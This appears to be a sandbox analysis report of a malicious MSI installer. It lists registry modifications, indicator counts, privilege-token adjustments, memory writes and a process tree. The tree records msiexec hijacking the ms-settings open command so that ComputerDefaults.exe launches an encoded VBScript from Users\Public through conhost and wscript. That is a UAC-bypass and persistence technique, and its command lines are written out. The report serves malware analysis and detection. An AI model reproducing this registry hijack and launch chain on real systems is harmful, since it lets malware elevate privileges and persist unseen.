\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppX0enk2acdsmv8ydhntbtea6yjp27223q6\Shell\open\command\ = "conhost wscript /B /E:VBScript.Encode \"../../Users/Public/TJOFMFRFMKKQ.sstz\"" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\PersistedStorageItemTable\System\74be88fe-056a-44fc-b604-cf1a4cfb82fa. = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\AppX8mn6f6acw2d3hves535dpq0zqnxqkec7\Shell\open\command\ = "AppX8mn6f6acw2d3hves535dpq0zqnxqkec7" MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix ComputerDefaults.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "887" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "1451" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "1534" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\CurVer MsiExec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\ms-settings\CurVer\ = "AppX0enk2acdsmv8ydhntbtea6yjp27223q6" MsiExec.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3048 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 4312 MsiExec.exe 4312 MsiExec.exe 2204 msiexec.exe 2204 msiexec.exe 2468 chrome.exe 2468 chrome.exe 3068 chrome.exe 3068 chrome.exe 3752 chrome.exe 3752 chrome.exe 3656 chrome.exe 3656 chrome.exe 5668 msedge.exe 5668 msedge.exe 5380 msedge.exe 5380 msedge.exe 6112 identity_helper.exe 6112 identity_helper.exe 5344 chrome.exe 5344 chrome.exe 6004 chrome.exe 6004 chrome.exe 4944 chrome.exe 4944 chrome.exe 5340 chrome.exe 5340 chrome.exe 3368 chrome.exe 3368 chrome.exe 3368 chrome.exe 3368 chrome.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3048 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 5380 msedge.exe 5380 msedge.exe 5380 msedge.exe 5380 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1264 msiexec.exe Token: SeIncreaseQuotaPrivilege 1264 msiexec.exe Token: SeSecurityPrivilege 2204 msiexec.exe Token: SeCreateTokenPrivilege 1264 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1264 msiexec.exe Token: SeLockMemoryPrivilege 1264 msiexec.exe Token: SeIncreaseQuotaPrivilege 1264 msiexec.exe Token: SeMachineAccountPrivilege 1264 msiexec.exe Token: SeTcbPrivilege 1264 msiexec.exe Token: SeSecurityPrivilege 1264 msiexec.exe Token: SeTakeOwnershipPrivilege 1264 msiexec.exe Token: SeLoadDriverPrivilege 1264 msiexec.exe Token: SeSystemProfilePrivilege 1264 msiexec.exe Token: SeSystemtimePrivilege 1264 msiexec.exe Token: SeProfSingleProcessPrivilege 1264 msiexec.exe Token: SeIncBasePriorityPrivilege 1264 msiexec.exe Token: SeCreatePagefilePrivilege 1264 msiexec.exe Token: SeCreatePermanentPrivilege 1264 msiexec.exe Token: SeBackupPrivilege 1264 msiexec.exe Token: SeRestorePrivilege 1264 msiexec.exe Token: SeShutdownPrivilege 1264 msiexec.exe Token: SeDebugPrivilege 1264 msiexec.exe Token: SeAuditPrivilege 1264 msiexec.exe Token: SeSystemEnvironmentPrivilege 1264 msiexec.exe Token: SeChangeNotifyPrivilege 1264 msiexec.exe Token: SeRemoteShutdownPrivilege 1264 msiexec.exe Token: SeUndockPrivilege 1264 msiexec.exe Token: SeSyncAgentPrivilege 1264 msiexec.exe Token: SeEnableDelegationPrivilege 1264 msiexec.exe Token: SeManageVolumePrivilege 1264 msiexec.exe Token: SeImpersonatePrivilege 1264 msiexec.exe Token: SeCreateGlobalPrivilege 1264 msiexec.exe Token: SeCreateTokenPrivilege 1264 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1264 msiexec.exe Token: SeLockMemoryPrivilege 1264 msiexec.exe Token: SeIncreaseQuotaPrivilege 1264 msiexec.exe Token: SeMachineAccountPrivilege 1264 msiexec.exe Token: SeTcbPrivilege 1264 msiexec.exe Token: SeSecurityPrivilege 1264 msiexec.exe Token: SeTakeOwnershipPrivilege 1264 msiexec.exe Token: SeLoadDriverPrivilege 1264 msiexec.exe Token: SeSystemProfilePrivilege 1264 msiexec.exe Token: SeSystemtimePrivilege 1264 msiexec.exe Token: SeProfSingleProcessPrivilege 1264 msiexec.exe Token: SeIncBasePriorityPrivilege 1264 msiexec.exe Token: SeCreatePagefilePrivilege 1264 msiexec.exe Token: SeCreatePermanentPrivilege 1264 msiexec.exe Token: SeBackupPrivilege 1264 msiexec.exe Token: SeRestorePrivilege 1264 msiexec.exe Token: SeShutdownPrivilege 1264 msiexec.exe Token: SeDebugPrivilege 1264 msiexec.exe Token: SeAuditPrivilege 1264 msiexec.exe Token: SeSystemEnvironmentPrivilege 1264 msiexec.exe Token: SeChangeNotifyPrivilege 1264 msiexec.exe Token: SeRemoteShutdownPrivilege 1264 msiexec.exe Token: SeUndockPrivilege 1264 msiexec.exe Token: SeSyncAgentPrivilege 1264 msiexec.exe Token: SeEnableDelegationPrivilege 1264 msiexec.exe Token: SeManageVolumePrivilege 1264 msiexec.exe Token: SeImpersonatePrivilege 1264 msiexec.exe Token: SeCreateGlobalPrivilege 1264 msiexec.exe Token: SeCreateTokenPrivilege 1264 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1264 msiexec.exe Token: SeLockMemoryPrivilege 1264 msiexec.exe -
Suspicious use of FindShellTrayWindow 46 IoCs
pid Process 1264 msiexec.exe 1264 msiexec.exe 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe 3048 Explorer.EXE 3048 Explorer.EXE 5380 msedge.exe 3048 Explorer.EXE 5380 msedge.exe 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3068 chrome.exe 3068 chrome.exe 3068 chrome.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE 3048 Explorer.EXE -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 3048 Explorer.EXE 4896 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2204 wrote to memory of 4312 2204 msiexec.exe 83 PID 2204 wrote to memory of 4312 2204 msiexec.exe 83 PID 4312 wrote to memory of 2308 4312 MsiExec.exe 31 PID 4312 wrote to memory of 2324 4312 MsiExec.exe 30 PID 4312 wrote to memory of 2424 4312 MsiExec.exe 29 PID 4312 wrote to memory of 3048 4312 MsiExec.exe 54 PID 4312 wrote to memory of 768 4312 MsiExec.exe 55 PID 4312 wrote to memory of 3248 4312 MsiExec.exe 56 PID 4312 wrote to memory of 3348 4312 MsiExec.exe 57 PID 4312 wrote to memory of 3412 4312 MsiExec.exe 58 PID 4312 wrote to memory of 3500 4312 MsiExec.exe 59 PID 4312 wrote to memory of 3840 4312 MsiExec.exe 60 PID 4312 wrote to memory of 4896 4312 MsiExec.exe 62 PID 4312 wrote to memory of 1264 4312 MsiExec.exe 80 PID 944 wrote to memory of 3372 944 cmd.exe 95 PID 944 wrote to memory of 3372 944 cmd.exe 95 PID 3372 wrote to memory of 4676 3372 ComputerDefaults.exe 97 PID 3372 wrote to memory of 4676 3372 ComputerDefaults.exe 97 PID 4676 wrote to memory of 1372 4676 conhost.exe 98 PID 4676 wrote to memory of 1372 4676 conhost.exe 98 PID 1656 wrote to memory of 424 1656 cmd.exe 112 PID 1656 wrote to memory of 424 1656 cmd.exe 112 PID 1684 wrote to memory of 5088 1684 cmd.exe 113 PID 1684 wrote to memory of 5088 1684 cmd.exe 113 PID 3564 wrote to memory of 4852 3564 cmd.exe 116 PID 3564 wrote to memory of 4852 3564 cmd.exe 116 PID 1468 wrote to memory of 3396 1468 cmd.exe 114 PID 1468 wrote to memory of 3396 1468 cmd.exe 114 PID 4768 wrote to memory of 4324 4768 cmd.exe 115 PID 4768 wrote to memory of 4324 4768 cmd.exe 115 PID 3384 wrote to memory of 4132 3384 cmd.exe 117 PID 3384 wrote to memory of 4132 3384 cmd.exe 117 PID 2632 wrote to memory of 1068 2632 cmd.exe 126 PID 2632 wrote to memory of 1068 2632 cmd.exe 126 PID 2260 wrote to memory of 2448 2260 cmd.exe 129 PID 2260 wrote to memory of 2448 2260 cmd.exe 129 PID 1068 wrote to memory of 2160 1068 ComputerDefaults.exe 130 PID 1068 wrote to memory of 2160 1068 ComputerDefaults.exe 130 PID 2160 wrote to memory of 292 2160 conhost.exe 131 PID 2160 wrote to memory of 292 2160 conhost.exe 131 PID 2448 wrote to memory of 3064 2448 ComputerDefaults.exe 132 PID 2448 wrote to memory of 3064 2448 ComputerDefaults.exe 132 PID 3064 wrote to memory of 4596 3064 conhost.exe 133 PID 3064 wrote to memory of 4596 3064 conhost.exe 133 PID 4604 wrote to memory of 1056 4604 cmd.exe 146 PID 4604 wrote to memory of 1056 4604 cmd.exe 146 PID 1696 wrote to memory of 1120 1696 cmd.exe 149 PID 1696 wrote to memory of 1120 1696 cmd.exe 149 PID 4660 wrote to memory of 3984 4660 cmd.exe 148 PID 4660 wrote to memory of 3984 4660 cmd.exe 148 PID 3152 wrote to memory of 1676 3152 cmd.exe 147 PID 3152 wrote to memory of 1676 3152 cmd.exe 147 PID 4292 wrote to memory of 1528 4292 cmd.exe 150 PID 4292 wrote to memory of 1528 4292 cmd.exe 150 PID 3804 wrote to memory of 1160 3804 cmd.exe 151 PID 3804 wrote to memory of 1160 3804 cmd.exe 151 PID 2656 wrote to memory of 3468 2656 cmd.exe 154 PID 2656 wrote to memory of 3468 2656 cmd.exe 154 PID 3468 wrote to memory of 3548 3468 ComputerDefaults.exe 155 PID 3468 wrote to memory of 3548 3468 ComputerDefaults.exe 155 PID 3548 wrote to memory of 3128 3548 conhost.exe 156 PID 3548 wrote to memory of 3128 3548 conhost.exe 156 PID 3036 wrote to memory of 2960 3036 cmd.exe 169 PID 3036 wrote to memory of 2960 3036 cmd.exe 169
Processes
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2424
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
PID:2324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Adds Run key to start application
- Modifies registry class
PID:2308 -
C:\Windows\System32\cmd.exe/c ComputerDefaults.exe2⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\system32\conhost.exe"conhost.exe" wscript /B /E:VBScript.Encode "../../Users/Public/RURRUJUJ.sstz"4⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\system32\wscript.exewscript /B /E:VBScript.Encode ../../Users/Public/RURRUJUJ.sstz5⤵PID:1372
-
-
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3048 -
C:\Windows\system32\msiexec.exemsiexec.exe /I "C:\Users\Admin\AppData\Local\Temp\Nicht bestätigt 172391.msi"2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1264 -
C:\Windows\System32\cmd.exe/c ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\system32\conhost.exe"conhost.exe" wscript /B /E:VBScript.Encode "../../Users/Public/TJOFMFRFMKKQ.sstz"5⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\wscript.exewscript /B /E:VBScript.Encode ../../Users/Public/TJOFMFRFMKKQ.sstz6⤵PID:292
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3068 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffedb304f50,0x7ffedb304f60,0x7ffedb304f703⤵PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:23⤵PID:3664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2012 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2280 /prefetch:83⤵PID:3432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:13⤵PID:3676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:13⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:13⤵PID:3548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4396 /prefetch:83⤵PID:3592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:83⤵PID:2004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4748 /prefetch:83⤵PID:3356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3648 /prefetch:83⤵PID:520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4992 /prefetch:83⤵PID:3944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5240 /prefetch:83⤵PID:5132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5336 /prefetch:83⤵PID:5192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:13⤵PID:5224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1572 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2540 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:6004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5100 /prefetch:83⤵PID:3852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:83⤵PID:1536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5068 /prefetch:83⤵PID:6028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3640 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5240 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:3368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2260 /prefetch:83⤵PID:3208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 /prefetch:83⤵PID:5200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3468 /prefetch:83⤵PID:1120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,1428223295104939744,15713695179842939191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:83⤵PID:3580
-
-
